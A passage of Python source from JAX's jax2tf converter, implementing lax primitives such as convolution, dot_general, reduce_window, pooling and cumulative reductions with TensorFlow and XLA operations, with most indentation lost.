>> DeviceArray([False, True], dtype=bool)
  if you assume that booleans are simply cast to integers.
jnp.bitwise_not(jnp.array([True, False]).astype(np.int32)).astype(bool)
>> DeviceArray([True, True], dtype=bool)
"""
if x.dtype == tf.bool:
return tf.logical_not(x)
else:
return tf.bitwise.invert(x)
tf_impl[lax.not_p] = _not
def bool_to_int8(f, argnums):
"""Computes bool valued functions using int8."""
argnums = tf.nest.flatten(argnums)
def wrapper(*args, **kwargs):
if not any(args[i].dtype == tf.bool for i in argnums):
return f(*args, **kwargs)
else:
args_cast = [(tf.cast(a, tf.int8) if i in argnums else a)
for i, a in enumerate(args)]
if "_in_avals" in kwargs:
def cast_aval(aval):
return core.ShapedArray(aval.shape, np.int8)
_in_avals_cast = [cast_aval(aval) if i in argnums else aval
for i, aval in enumerate(kwargs["_in_avals"])]
_out_aval_cast = tf.nest.map_structure(cast_aval, kwargs["_out_aval"])
kwargs = dict(kwargs, _in_avals=_in_avals_cast, _out_aval=_out_aval_cast)
out = f(*args_cast, **kwargs)
return tf.nest.map_structure(lambda o: tf.cast(o, tf.bool), out)
return wrapper
tf_impl[lax.or_p] = bool_to_int8(tf.bitwise.bitwise_or, argnums=(0, 1))
tf_impl[lax.and_p] = bool_to_int8(tf.bitwise.bitwise_and, argnums=(0, 1))
tf_impl[lax.xor_p] = bool_to_int8(tf.bitwise.bitwise_xor, argnums=(0, 1))
tf_impl[lax.eq_p] = tf.math.equal
tf_impl[lax.ne_p] = tf.math.not_equal
tf_impl[lax.ge_p] = tf.math.greater_equal
tf_impl[lax.gt_p] = tf.math.greater
tf_impl[lax.le_p] = tf.math.less_equal
tf_impl[lax.lt_p] = tf.math.less
tf_impl[lax_linalg.cholesky_p] = tf.linalg.cholesky
def _convert_element_type(operand, *, new_dtype, weak_type=False):
old_dtype = operand.dtype.as_numpy_dtype
if (dtypes.issubdtype(old_dtype, np.complexfloating) and
not dtypes.issubdtype(new_dtype, np.complexfloating)):
operand = tf.math.real(operand)
if (dtypes.issubdtype(old_dtype, np.floating) and
not (dtypes.issubdtype(new_dtype, np.floating) or
dtypes.issubdtype(new_dtype, np.complexfloating) or
new_dtype == np.bool_)):
sign = tf.math.sign(operand)
operand = sign * tf.math.floor(sign * operand)
return tf.dtypes.cast(operand, to_tf_dtype(new_dtype))
tf_impl[lax.convert_element_type_p] = _convert_element_type
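# Illustrative sketch (hypothetical helper, relying on the module-level `tf`
# and `np` imports): when converting floats to integers,
# `_convert_element_type` truncates toward zero by computing
# sign(x) * floor(sign(x) * x) before the cast.
def _example_convert_float_to_int():
  x = tf.constant([-2.7, -0.5, 0.5, 2.7], dtype=tf.float32)
  return _convert_element_type(x, new_dtype=np.int32)  # [-2, 0, 0, 2]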
def _bitcast_convert_type(operand, new_dtype):
return tf.bitcast(operand, to_tf_dtype(new_dtype))
tf_impl[lax.bitcast_convert_type_p] = _bitcast_convert_type
def _clamp(minval, operand, maxval):
# The below permits mirroring the behavior of JAX when maxval < minval
maxval = tf.broadcast_to(maxval, operand.shape)
minval = tf.math.minimum(tf.broadcast_to(minval, operand.shape), maxval)
return tf.clip_by_value(operand, minval, maxval)
tf_impl[lax.clamp_p] = _clamp
def _concatenate(*operands, dimension):
return tf.concat(operands, axis=dimension)
tf_impl[lax.concatenate_p] = _concatenate
def _conv_general_dimension_numbers_proto(dimension_numbers):
"""Converts a ConvDimensionNumbers to an XLA ConvolutionDimensionNumbers."""
assert isinstance(dimension_numbers, lax.ConvDimensionNumbers)
lhs_spec, rhs_spec, out_spec = dimension_numbers
proto = xla_data_pb2.ConvolutionDimensionNumbers()
proto.input_batch_dimension = lhs_spec[0]
proto.input_feature_dimension = lhs_spec[1]
proto.output_batch_dimension = out_spec[0]
proto.output_feature_dimension = out_spec[1]
proto.kernel_output_feature_dimension = rhs_spec[0]
proto.kernel_input_feature_dimension = rhs_spec[1]
proto.input_spatial_dimensions.extend(lhs_spec[2:])
proto.kernel_spatial_dimensions.extend(rhs_spec[2:])
proto.output_spatial_dimensions.extend(out_spec[2:])
return proto
def _conv_general_precision_config_proto(precision):
"""Convert an integer to an XLA.PrecisionConfig."""
if precision is None:
return None
proto = xla_data_pb2.PrecisionConfig()
proto.operand_precision.append(int(precision))
return proto
# _try_tf_conv returns a Tensor when it succeeds, or a string describing why
# it did not succeed otherwise.
def _try_tf_conv(lhs, rhs, window_strides, padding, lhs_dilation, rhs_dilation,
dimension_numbers, feature_group_count, batch_group_count,
out_shape) -> Union[str, TfVal]:
# TODO(bchetioui): this function is not exhaustive wrt which convolution cases
# can be translated into TF primitives. Further investigation is needed to
# fully flesh it out.
if not lhs.dtype in [tf.float16, tf.float32, tf.float64]:
return f"tf.nn.convolution is not supported for dtype {lhs.dtype}"
if feature_group_count != 1:
return "tf.nn.convolution does not support grouped convolutions"
# TODO(bchetioui): is there something to do with batch_group_count?
if batch_group_count != 1:
return "Unimplemented support for batch_group_count != 1"
nb_spatial_dimensions = len(lhs.shape) - 2
# TF can only deal with 1D, 2D and 3D convolution
if nb_spatial_dimensions < 1 or nb_spatial_dimensions > 3:
return ("TensorFlow can only handle convolutions with 1, 2, or 3 "
"spatial dimensions")
# TODO(bchetioui): handle different stride cases
if list(window_strides) != [1] * nb_spatial_dimensions:
return ("Unimplemented support for window_strides != "
f"{tuple([1] * nb_spatial_dimensions)}")
success = lambda res: (res, None)
failure = lambda msg: (None, msg)
def convert_padding():
    # TODO(bchetioui): in this instance, we cannot use padtype_to_pads as
# string padding is not implemented for transposed convolution.
if list(lhs_dilation) != [1] * nb_spatial_dimensions:
return failure("Padding conversion is not supported for transposed "
"convolution.")
lhs_perm, rhs_perm, _ = dimension_numbers
effective_rhs_shape = [(k-1) * r + 1 for k, r in
zip(np.take(rhs.shape, rhs_perm)[2:], rhs_dilation)]
lhs_shape = np.take(lhs.shape, lhs_perm)[2:]
# TF only allows 'VALID' and 'SAME' padding
for pad_str in ['VALID', 'SAME']:
gen_padding = lax.padtype_to_pads(
lhs_shape, effective_rhs_shape, window_strides, pad_str)
if list(gen_padding) == list(padding):
return success(pad_str)
return failure("Input padding not supported in TensorFlow.")
def convert_dim_nums():
lhs_spec, rhs_spec, out_spec = dimension_numbers
# TF only allows filters with shape:
# spatial_filter_shape + [in_channels, out_channels]. In JAX however,
# rhs_spec is represented as a tuple containing the following:
# [out_channels, in_channels] + spatial_filter_shape.
supported_rhs_shape = ([nb_spatial_dimensions + 1, nb_spatial_dimensions] +
list(range(nb_spatial_dimensions)))
if list(rhs_spec) != supported_rhs_shape:
return failure("Input filter (RHS) shape format not supported in "
"TensorFlow")
# TF only supports same LHS and output data format
if lhs_spec != out_spec:
return failure("TensorFlow requires the same data format for LHS and "
"output.")
# Alphabet extracted from the documentation of tf.conv{1,2,3}d
spatial_dim_alphabet = 'DHW'[-nb_spatial_dimensions:]
# TF only supports the following data formats:
# - [batch_size, in_channels] + input_spatial_shape
# TODO(bchetioui): TF currently does not support the above on CPU. To avoid
# failing on this platform, this path is commented out for now.
#if list(lhs_spec) == list(range(len(lhs_spec))):
# return "NC" + spatial_dim_alphabet
# - [batch_size] + input_spatial_shape + [in_channels]
if list(lhs_spec) == ([0, len(lhs_spec) - 1] +
list(range(1, len(lhs_spec) - 1))):
return success("N" + spatial_dim_alphabet + "C")
return failure("Data format is unsupported by TensorFlow")
def convert_dilation_and_compute_result(tf_padding, tf_dim_nums):
no_dilation = [1] * nb_spatial_dimensions
# TODO(bchetioui): is there a generic way to do a transposed atrous
# convolution in TensorFlow?
if not (list(lhs_dilation) == no_dilation or
list(rhs_dilation) == no_dilation):
return "Both LHS and RHS dilations are set"
# This is a non-dilated or atrous convolution
if list(lhs_dilation) == no_dilation:
return tf.nn.convolution(
lhs, rhs, strides=window_strides, padding=tf_padding,
data_format=tf_dim_nums, dilations=rhs_dilation)
# TODO(bchetioui): the below path is unreachable for now, as passing a lhs
# dilation to this function will result in convert_padding returning None
# systematically. This must be investigated further.
# Dilation of the LHS is transposed convolution
return tf.nn.conv_transpose(
lhs, rhs, out_shape, window_strides, padding=tf_padding,
data_format=tf_dim_nums, dilations=lhs_dilation)
tf_padding, error = convert_padding()
if tf_padding is None:
return error
tf_dim_nums, error = convert_dim_nums()
if tf_dim_nums is None:
return error
return convert_dilation_and_compute_result(tf_padding, tf_dim_nums)
def _conv_general_dilated(lhs, rhs, window_strides, padding, lhs_dilation,
rhs_dilation, dimension_numbers, feature_group_count,
batch_group_count, lhs_shape, rhs_shape, precision,
_in_avals, _out_aval):
"""Implementation of lax.conv_general_dilated_p using XlaConv."""
if not _enable_xla:
info_or_result = _try_tf_conv(
lhs, rhs, window_strides, padding, lhs_dilation, rhs_dilation,
dimension_numbers, feature_group_count, batch_group_count, _aval_to_tf_shape(_out_aval)
)
if not isinstance(info_or_result, str):
return info_or_result
else:
raise _xla_path_disabled_error("conv_general_dilated")
dnums_proto = _conv_general_dimension_numbers_proto(dimension_numbers)
precision_config_proto = _conv_general_precision_config_proto(precision)
assert batch_group_count == 1 # TODO(phawkins): implement batch_group_count
out = tfxla.conv(
lhs, rhs, window_strides, padding, lhs_dilation, rhs_dilation,
dnums_proto, feature_group_count=feature_group_count,
precision_config=precision_config_proto)
# TODO: implement shape inference for XlaConv
out.set_shape(_aval_to_tf_shape(_out_aval))
return out
tf_impl_with_avals[lax.conv_general_dilated_p] = _conv_general_dilated
def _dot_general(lhs, rhs, dimension_numbers, precision, preferred_element_type):
"""Implementation of lax.dot_general_p in terms of tf.linalg.einsum."""
del precision
del preferred_element_type
(lhs_contracting, rhs_contracting), (lhs_batch, rhs_batch) = dimension_numbers
lhs_dim, rhs_dim = len(lhs.shape), len(rhs.shape)
# This condition ensures that:
# 1) the considered dtype is not tf.bfloat16/tf.int32, which are supported by
# tf.linalg.einsum but not by tf.linalg.matmul;
# 2) the batch dimensions are ordered in the same way in lhs and rhs (this is
  #    not strictly necessary, but we would have to reshape the array if that
  #    were not the case);
# 3) lhs and rhs have the same number of dimensions +/- 1
# 4) the number of non-batch dimensions in both tensors is either 1 or 2
# 5) the contracting dimensions are consistent with those of a classic
# matrix/matrix, vector/matrix or matrix/vector multiplication.
if (not lhs.dtype in [tf.bfloat16, tf.int32]
and lhs_batch == rhs_batch == tuple(range(len(lhs_batch)))
and lhs_dim - rhs_dim in [-1, 0, 1]
and 1 <= lhs_dim - len(lhs_batch) <= 2
and 1 <= rhs_dim - len(rhs_batch) <= 2
and lhs_contracting == (len(lhs.shape) - 1,)
and rhs_contracting == (len(lhs_batch),)):
# All the inputs to tf.linalg.matmul must have 2 inner dimensions,
# after their batch dimensions, so we need to expand the dimensions
# appropriately. We can get to this branch with three combinations of
# inner shapes:
# - lhs.inner_shape == [a, b], rhs.inner_shape == [b, c]
# - in this case, the resulting inner shape is [a, c];
# - lhs.inner_shape == [b] , rhs.inner_shape == [b, c]
# - in this case, we need to expand lhs to [1, b], and the resulting
# shape is [c]. We need to squeeze the result of tf.linalg.matmul
# as it will have shape [1, c];
# - lhs.shape == [batch] + [a, b], rhs.shape == [batch] + [b]
# - in this case, we need to expand rhs to [b, 1], and the resulting
# shape is [a]. We need to squeeze the result of tf.linalg.matmul
# as it will have shape [a, 1];
# - lhs.shape == [batch] + [b] , rhs.shape == [batch] + [b]
# - in this case, we need to expand lhs to [1, b] and rhs to [b, 1],
# and the resulting shape is (). We need to squeeze the result of
# tf.linalg.matmul as it will have shape [1, 1].
squeeze_idxs = []
if lhs_dim - len(lhs_batch) == 1:
lhs = tf.expand_dims(lhs, lhs_dim - 1)
squeeze_idxs.append(len(lhs.shape) - 2)
if rhs_dim - len(rhs_batch) == 1:
rhs = tf.expand_dims(rhs, rhs_dim - 2)
squeeze_idxs.append(len(rhs.shape) - 1)
result = tf.linalg.matmul(lhs, rhs)
if len(squeeze_idxs) != 0:
result = tf.squeeze(result, squeeze_idxs)
return result
new_id = iter(string.ascii_letters)
lhs_axis_ids = [next(new_id) for _ in lhs.shape]
rhs_axis_ids = [next(new_id) for _ in rhs.shape]
lhs_out_axis_ids = lhs_axis_ids[:]
rhs_out_axis_ids = rhs_axis_ids[:]
for lhs_axis, rhs_axis in zip(lhs_contracting, rhs_contracting):
shared_id = next(new_id)
lhs_axis_ids[lhs_axis] = shared_id
rhs_axis_ids[rhs_axis] = shared_id
lhs_out_axis_ids[lhs_axis] = None
rhs_out_axis_ids[rhs_axis] = None
batch_ids = []
for lhs_axis, rhs_axis in zip(lhs_batch, rhs_batch):
shared_id = next(new_id)
lhs_axis_ids[lhs_axis] = shared_id
rhs_axis_ids[rhs_axis] = shared_id
lhs_out_axis_ids[lhs_axis] = None
rhs_out_axis_ids[rhs_axis] = None
batch_ids.append(shared_id)
not_none = lambda x: x is not None
out_axis_ids = list(filter(
not_none, batch_ids + lhs_out_axis_ids + rhs_out_axis_ids))
assert lhs.dtype == rhs.dtype
spec = "{},{}->{}".format("".join(lhs_axis_ids),
"".join(rhs_axis_ids),
"".join(out_axis_ids))
return tf.linalg.einsum(spec, lhs, rhs)
tf_impl[lax.dot_general_p] = _dot_general
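# Illustrative sketch (hypothetical helper, relying on the module-level `tf`
# import): a batched matrix multiply with trailing contracting dimensions hits
# the tf.linalg.matmul fast path above; other contractions fall back to the
# generated tf.linalg.einsum spec.
def _example_dot_general():
  lhs = tf.ones((2, 3, 4), dtype=tf.float32)        # [batch, m, k]
  rhs = tf.ones((2, 4, 5), dtype=tf.float32)        # [batch, k, n]
  dimension_numbers = (((2,), (1,)), ((0,), (0,)))  # contract k; batch dim 0
  return _dot_general(lhs, rhs, dimension_numbers,
                      precision=None, preferred_element_type=None)  # (2, 3, 5)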
def _broadcast(operand, *, sizes):
result_shape = tf.TensorShape(sizes).concatenate(operand.shape)
return tf.broadcast_to(operand, result_shape)
tf_impl[lax.broadcast_p] = _broadcast
def _broadcast_in_dim(operand, *, shape, broadcast_dimensions):
inshape = [1] * len(shape)
for orig_shape_i, broadcast_dim_i in zip(operand.shape, broadcast_dimensions):
if orig_shape_i != 1: inshape[broadcast_dim_i] = shape[broadcast_dim_i]
inshape_tf = _eval_shape(inshape)
shape_tf = _eval_shape(shape)
return tf.broadcast_to(tf.reshape(operand, inshape_tf), shape_tf)
tf_impl[lax.broadcast_in_dim_p] = _broadcast_in_dim
def _reshape(operand, *, new_sizes, dimensions):
if dimensions is None:
dimensions = tf.range(tf.rank(operand))
new_sizes_tf = _eval_shape(new_sizes)
return tf.reshape(tf.transpose(operand, dimensions), new_sizes_tf)
tf_impl[lax.reshape_p] = _reshape
def _squeeze(operand, *, dimensions, _in_avals, _out_aval):
op_shape = _in_avals[0].shape
new_shape = tuple(d for i, d in enumerate(op_shape) if i not in dimensions)
new_shape_tf = _eval_shape(new_shape)
return tf.reshape(operand, new_shape_tf)
tf_impl_with_avals[lax.squeeze_p] = _squeeze
def _pad(operand, padding_value, *, padding_config,
_in_avals: Sequence[core.AbstractValue],
_out_aval: core.AbstractValue):
del _in_avals
low, high, interior = util.unzip3(padding_config)
if all(lo >= 0 and hi >= 0 and i == 0 for lo, hi, i in padding_config):
return tf.pad(operand, util.safe_zip(low, high),
mode="CONSTANT", constant_values=padding_value)
if not _enable_xla:
raise _xla_path_disabled_error("pad")
out = tfxla.pad(operand, padding_value, low, high, interior)
return out
tf_impl_with_avals[lax.pad_p] = _pad
def _rev(operand, *, dimensions):
return tf.reverse(operand, dimensions)
tf_impl[lax.rev_p] = _rev
tf_impl[lax.select_p] = tf.where
def _transpose(operand, *, permutation):
return tf.transpose(operand, perm=permutation)
tf_impl[lax.transpose_p] = _transpose
axes_to_axis = lambda func: lambda operand, axes: func(operand, axis=axes)
tf_impl[lax.reduce_sum_p] = (
bool_to_int8(axes_to_axis(tf.reduce_sum), argnums=0))
tf_impl[lax.reduce_prod_p] = (
bool_to_int8(axes_to_axis(tf.reduce_prod), argnums=0))
tf_impl[lax.reduce_max_p] = (
bool_to_int8(axes_to_axis(tf.reduce_max), argnums=0))
tf_impl[lax.reduce_min_p] = (
bool_to_int8(axes_to_axis(tf.reduce_min), argnums=0))
tf_impl[lax.reduce_or_p] = axes_to_axis(tf.reduce_any)
tf_impl[lax.reduce_and_p] = axes_to_axis(tf.reduce_all)
def _argminmax(fn, operand, axes, index_dtype):
axis, = axes
output_type = tf.int32
if dtypes.iinfo(index_dtype).bits > 32:
output_type = tf.int64
# TODO(phawkins): handle axes larger than 2^31.
result = fn(operand, axis=axis, output_type=output_type)
return tf.cast(result, to_tf_dtype(index_dtype))
tf_impl[lax.argmin_p] = functools.partial(_argminmax, tf.math.argmin)
tf_impl[lax.argmax_p] = functools.partial(_argminmax, tf.math.argmax)
_add_fn = tf.function(_add, autograph=False)
_ge_fn = tf.function(tf.math.greater_equal, autograph=False)
def _select_and_gather_add(tangents: TfVal,
operand: TfVal,
select_prim: core.Primitive,
window_dimensions: Sequence[int],
window_strides: Sequence[int],
base_dilation: Sequence[int],
window_dilation: Sequence[int],
padding: Sequence[Tuple[int, int]],
_in_avals: Sequence[core.AbstractValue],
_out_aval: core.AbstractValue):
# Note: this function follows the pattern in
# jax.lax._select_and_gather_add_translation.
dtype = operand.dtype
nbits = dtypes.finfo(dtype.as_numpy_dtype).bits
  # Specializing the function for 64 bits. Only up to 32 bits are supported on
  # TPU, so we let the code raise a different exception on that platform.
max_bits = 64
assert nbits <= max_bits
double_word_reduction = nbits * 2 <= max_bits
const = lambda dtype, x: tf.constant(np.array(x), dtype)
if double_word_reduction:
word_dtype = lax._UINT_DTYPES[nbits]
double_word_dtype = lax._UINT_DTYPES[nbits * 2]
# Packs two values into a tuple.
def pack(a, b):
a = _bitcast_convert_type(a, word_dtype)
b = _bitcast_convert_type(b, word_dtype)
a = _convert_element_type(a, new_dtype=double_word_dtype)
b = _convert_element_type(b, new_dtype=double_word_dtype)
a = tf.bitwise.left_shift(a, const(double_word_dtype, nbits))
return tf.bitwise.bitwise_or(a, b)
# Unpacks the first element of a tuple.
def fst(t):
assert t.dtype == double_word_dtype
st = _shift_right_logical(t, const(double_word_dtype, nbits))
return _bitcast_convert_type(
_convert_element_type(st, new_dtype=word_dtype), dtype
)
# Unpacks the second element of a tuple.
def snd(t):
return _bitcast_convert_type(
_convert_element_type(t, new_dtype=word_dtype), dtype
)
else:
raise NotImplementedError(f"TODO: need to pack {nbits * 2} bits but this platform can only go up to {max_bits} bits.")
assert select_prim is lax.ge_p or select_prim is lax.le_p, select_prim
def reducer(x, y):
which = tf_impl[select_prim]
return tf_impl[lax.select_p](which(fst(x), fst(y)), x=x, y=y)
init = -np.inf if select_prim is lax.ge_p else np.inf
init_identity = lambda x: pack(const(dtype, init), const(dtype, 0))
out = _specialized_reduce_window(reducer, init_identity,
pack(operand, tangents),
window_dimensions=window_dimensions,
window_strides=window_strides,
padding=padding, base_dilation=base_dilation,
window_dilation=window_dilation,
_in_avals=_in_avals, _out_aval=_out_aval)
return snd(out)
tf_impl_with_avals[lax.select_and_gather_add_p] = _select_and_gather_add
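# Standalone sketch (hypothetical helper, relying on the module-level `np`
# import) of the double-word packing trick used above: two 32-bit values are
# bit-packed into one 64-bit word so that a single reduce_window can select on
# the operand (high word) while carrying the tangent along (low word).
def _example_pack_unpack(a, b):
  a_bits = np.float32(a).view(np.uint32).astype(np.uint64)
  b_bits = np.float32(b).view(np.uint32).astype(np.uint64)
  packed = (a_bits << np.uint64(32)) | b_bits
  fst_val = np.uint32(packed >> np.uint64(32)).view(np.float32)         # == a
  snd_val = np.uint32(packed & np.uint64(0xFFFFFFFF)).view(np.float32)  # == b
  return packed, fst_val, snd_val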
def _get_shape_from_tensor_or_array(x):
if isinstance(x.shape, tf.TensorShape):
return tuple(x.shape.as_list())
return tuple(x.shape)
def _common_reduce_window(operand, init_val, reducer, window_dimensions,
window_strides, padding, base_dilation,
window_dilation, _in_avals, _out_aval):
if not _enable_xla:
raise _xla_path_disabled_error("reduce_window")
o_spec = tf.TensorSpec((), dtype=operand.dtype)
reducer_fn = tf.function(reducer, autograph=False).get_concrete_function(o_spec, o_spec)
if not isinstance(init_val, tf.Tensor):
assert core.skip_checks or _is_tfval(init_val), f"Non TfVal: {init_val}"
init_val = tf.constant(init_val, operand.dtype)
out = tfxla.reduce_window(operand, init_val,
reducer_fn, window_dimensions,
window_strides, base_dilations=base_dilation,
window_dilations=window_dilation, padding=padding)
# TODO: implement shape inference for XlaReduceWindow
out.set_shape(_aval_to_tf_shape(_out_aval))
return out
def _reduce_window(operand, init_value, *, jaxpr, consts, window_dimensions,
window_strides, padding, base_dilation, window_dilation,
_in_avals, _out_aval):
"""TensorFlow implementation of reduce_window.
Args:
operand: N dimensional array containing elements of type T
init_value: starting value of the reduction
jaxpr: the jaxpr corresponding to the reduction function
consts: the constants associated with jaxpr.
window_dimensions: array of integers for window dimension values
window_strides: array of integers for window stride values
padding: array of pairs of integers for padding values
base_dilation: array of integers for base dilation values
window_dilation: array of integers for window dilation values
Returns:
The reduced operand.
"""
assert len(consts) == 0, "Reduction computation cannot have constants"
def reducer(arg1: TfVal, arg2: TfVal) -> TfVal:
closed_jaxpr = core.ClosedJaxpr(jaxpr, consts)
res, = _interpret_jaxpr(closed_jaxpr, arg1, arg2)
return res
return _common_reduce_window(
operand, init_value, reducer, window_dimensions, window_strides, padding,
base_dilation, window_dilation, _in_avals, _out_aval
)
# _try_tf_pool returns a Tensor when it succeeds, or a string describing why
# it did not succeed otherwise. It currently only supports reduce_window_max
# and reduce_window_sum.
# TODO(bchetioui): this function is not exhaustive wrt which
# reduce_window_max or reduce_window_sum cases can be translated into a call to
# max_pool or avg_pool. Further investigation is needed to fully flesh it out.
def _try_tf_pool(op_name, operand, window_dimensions, window_strides, padding,
base_dilation, window_dilation) -> Union[str, TfVal]:
  # Contrary to the main path, tf.int8 is actually a valid type for
# tf.nn.max_pool.
if op_name == "reduce_window_max" and operand.dtype in [
tf.bool, tf.uint32, tf.uint64, tf.complex64, tf.complex128
]:
return f"tf.nn.max_pool does not support operands of type {operand.dtype}"
if op_name == "reduce_window_sum" and operand.dtype not in [
tf.float16, tf.float32, tf.float64
]:
return f"tf.nn.avg_pool does not support operands of type {operand.dtype}"
has_batch_dim = window_dimensions[0] == 1
has_channel_dim = window_dimensions[-1] == 1
nb_spatial_dimensions = len(operand.shape) - has_batch_dim - has_channel_dim
if nb_spatial_dimensions < 1 or nb_spatial_dimensions > 3:
return ("TensorFlow can only handle pooling for arrays with 1, 2, or "
"3 spatial dimensions")
# TODO(bchetioui): does a simple conversion with another base dilation exist?
if list(base_dilation) != [1] * len(operand.shape):
return "Unimplemented support for base dilation"
# TODO(bchetioui): does a simple conversion with another window_dilation
# exist? The whole story seems similar to convolution.
if list(window_dilation) != [1] * len(operand.shape):
return "Unimplemented support for window dilation"
if list(padding) != [(0, 0)] * len(operand.shape):
return "Unimplemented support for padding"
# ReduceWindow in XLA takes an array of rank N as a parameter, but
# tf.nn.max_pool / tf.nn.avg_pool take an array of rank N+2, with a default
# shape of the form [batch_size] + input_spatial_shape + [num_channels]
tf_operand = operand
tf_window_dimensions = list(window_dimensions)
tf_window_strides = list(window_strides)
if not has_batch_dim:
tf_operand = tf.expand_dims(tf_operand, 0)
tf_window_dimensions = [1] + tf_window_dimensions
tf_window_strides = [1] + tf_window_strides
if not has_channel_dim:
tf_operand = tf.expand_dims(tf_operand, -1)
tf_window_dimensions.append(1)
tf_window_strides.append(1)
tf_data_format = "N" + "DHW"[-nb_spatial_dimensions:] + "C"
tf_padding = "VALID"
if op_name == "reduce_window_max":
result = tf.nn.max_pool(tf_operand, tf_window_dimensions, tf_window_strides,
tf_padding, tf_data_format)
elif op_name == "reduce_window_sum":
avg = tf.nn.avg_pool(tf_operand, tf_window_dimensions, tf_window_strides,
tf_padding, tf_data_format)
result = avg * np.prod(tf_window_dimensions)
else:
return f"Unimplemented support for {op_name}"
if not has_batch_dim:
result = tf.squeeze(result, 0)
if not has_channel_dim:
result = tf.squeeze(result, -1)
return result
def _specialized_reduce_window(reducer, identity, operand, *, window_dimensions,
window_strides, padding, base_dilation,
window_dilation, _in_avals, _out_aval,
name=None):
"""Wraps the TensorFlow reduce window operation based on a reducer and an
identity function defining the initial value of the reduction depending on
the dtype of the operand.
Args:
reducer: reduction function of type TfVal -> TfVal -> TfVal
identity: function that takes a TensorFlow dtype as a parameter and returns
the starting value of the reduction.
operand: N dimensional array containing elements of type T
window_dimensions: array of integers for window dimension values
window_strides: array of integers for window stride values
padding: array of pairs of integers for padding values
base_dilation: array of integers for base dilation values
window_dilation: array of integers for window dilation values
name: the name of the specialized reduce window primitive for which this
conversion function is called. This information may help to choose a
different conversion path (optional)
Returns:
The reduced operand.
"""
if name in ["reduce_window_max", "reduce_window_sum"]:
res = _try_tf_pool(name, operand, window_dimensions, window_strides,
padding, base_dilation, window_dilation)
if not isinstance(res, str):
return res
return _common_reduce_window(
operand, identity(operand.dtype), reducer, window_dimensions,
window_strides, padding, base_dilation, window_dilation, _in_avals,
_out_aval
)
def _get_max_identity(tf_dtype):
numpy_tf_dtype = tf_dtype.as_numpy_dtype
if tf_dtype == tf.bfloat16 or dtypes.issubdtype(numpy_tf_dtype, np.inexact):
return numpy_tf_dtype(-np.inf)
elif dtypes.issubdtype(numpy_tf_dtype, np.integer):
return dtypes.iinfo(numpy_tf_dtype).min
else:
assert dtypes.issubdtype(numpy_tf_dtype, np.bool_), (
f"{tf_dtype} has no defined max identity"
)
return False
def _get_min_identity(tf_dtype):
numpy_tf_dtype = tf_dtype.as_numpy_dtype
if tf_dtype == tf.bfloat16 or dtypes.issubdtype(numpy_tf_dtype, np.inexact):
return numpy_tf_dtype(np.inf)
elif dtypes.issubdtype(numpy_tf_dtype, np.integer):
return dtypes.iinfo(numpy_tf_dtype).max
else:
assert dtypes.issubdtype(numpy_tf_dtype, np.bool_), (
f"{tf_dtype} has no defined min identity"
)
return True
# pylint: disable=protected-access
tf_impl_with_avals[lax.reduce_window_sum_p] = (
functools.partial(_specialized_reduce_window, _add, lambda x: 0,
name="reduce_window_sum"))
tf_impl_with_avals[lax.reduce_window_min_p] = (
functools.partial(_specialized_reduce_window, tf.math.minimum,
_get_min_identity, name="reduce_window_min"))
tf_impl_with_avals[lax.reduce_window_max_p] = (
functools.partial(_specialized_reduce_window, tf.math.maximum,
_get_max_identity, name="reduce_window_max"))
tf_impl_with_avals[lax.reduce_window_p] = _reduce_window
# pylint: enable=protected-access
# We use lax_control_flow._cumred_tpu_translation_rule to convert cummax,
# cummin, cumsum and cumprod. This is efficient on TPU, but the complexity is
# O(n^2) on other backends. This may be implemented using associative_scan
# instead to favor different backends.
tf_impl_with_avals[lax_control_flow.cummin_p] = _convert_jax_impl(
functools.partial(lax_control_flow._cumred_tpu_translation_rule,
lax._reduce_window_min), multiple_results=False)
tf_impl_with_avals[lax_control_flow.cummax_p] = _convert_jax_impl(
functools.partial(lax_control_flow._cumred_tpu_translation_rule,
lax._reduce_window_max), multiple_results=False)
# TODO(bchetioui): cumsum and cumprod can be converted using pure TF ops for
# certain dtypes: bfloat16, float16, float32, float64, and int32. Other dtypes
# will fail when running in compiled mode, but are otherwise compatible with
# the operation. A non-XLA path can thus be defined for all dtypes, though the
# tests will crash.
tf_impl_with_avals[lax_control_flow.cumsum_p] = _convert_jax_impl(
functools.partial(lax_control_flow._cumred_tpu_translation_rule,
lax._reduce_window_sum), multiple_results=False)
tf_impl_with_avals[lax_control_flow.cumprod_p] = _convert_jax_impl(
functools.partial(lax_control_flow._cumred_tpu_translation_rule,
lax._reduce_window_prod), multiple_results=False)
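# A hedged sketch of the pure-TF path mentioned in the TODO above (the helper
# and its parameter list are hypothetical; the actual cumsum primitive's
# parameters may differ). For dtypes that tf.math.cumsum supports, this avoids
# the O(n^2) reduce_window-based conversion on non-TPU backends.
def _example_tf_cumsum(operand: TfVal, *, axis: int) -> TfVal:
  return tf.math.cumsum(operand, axis=axis)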
def _select_and_scatter(
operand, source, init_value, select_jaxpr, select_consts, scatter_jaxpr,
scatter_consts, window_dimensions, window_strides, padding):
raise NotImplementedError("TODO: jax2tf can not convert _select_and_scatter")
tf_impl[lax.select_and_scatter_p] = _select_and_scatter
@functools.partial(bool_to_int8, argnums=(0, 1))
def _select_and_scatter_add(source, operand, *, select_prim, window_dimensions,
window_strides, padding, _in_avals, _out_aval):
if not _enable_xla:
raise _xla_path_disabled_error("select_and_scatter_add")
init_value = tf.zeros((), operand.dtype)
select_fn = (tf.function(tf_impl[select_prim], autograph=False)
.get_concrete_function(init_value, init_value))
scatter_fn = _add_fn.get_concrete_function(init_value, init_value)
out = tfxla.select_and_scatter(operand, window_dimensions, window_strides,
padding, source, init_value, select_fn,
scatter_fn)
out.set_shape(_aval_to_tf_shape(_out_aval))
return out
tf_impl_with_avals[lax.select_and_scatter_add_p] = _select_and_scatter_add
def _threefry2x32_jax_impl(*args: TfVal, _in_avals, _out_aval):
res = _convert_jax_impl(
functools.partial(jax._src.random._threefry2x32_lowering,
use_rolled_loops=False),
multiple_results=True)(*args, _in_avals=_in_avals, _out_aval=_out_aval)
return res
tf_impl_with_avals[jax.random.threefry2x32_p] = _threefry2x32_jax_impl
# Use the vmap implementation, otherwise on TPU the performance is really bad.
# With use_vmap=True, we get about the same performance for JAX and jax2tf.
tf_impl_with_avals[random.random_gamma_p] = _convert_jax_impl(
functools.partial(jax._src.random._gamma_impl, use_vmap=True),
multiple_results=False)
def _gather_dimensions_proto(indices_shape, dimension_numbers):
proto = xla_data_pb2.GatherDimensionNumbers()
proto.offset_dims.extend(dimension_numbers.offset_dims)
proto.collapsed_slice_dims.extend(dimension_numbers.collapsed_slice_dims)
proto.start_index_map.extend(dimension_numbers.start_index_map)
assert indices_shape
proto.index_vector_dim = len(indices_shape) - 1
return proto
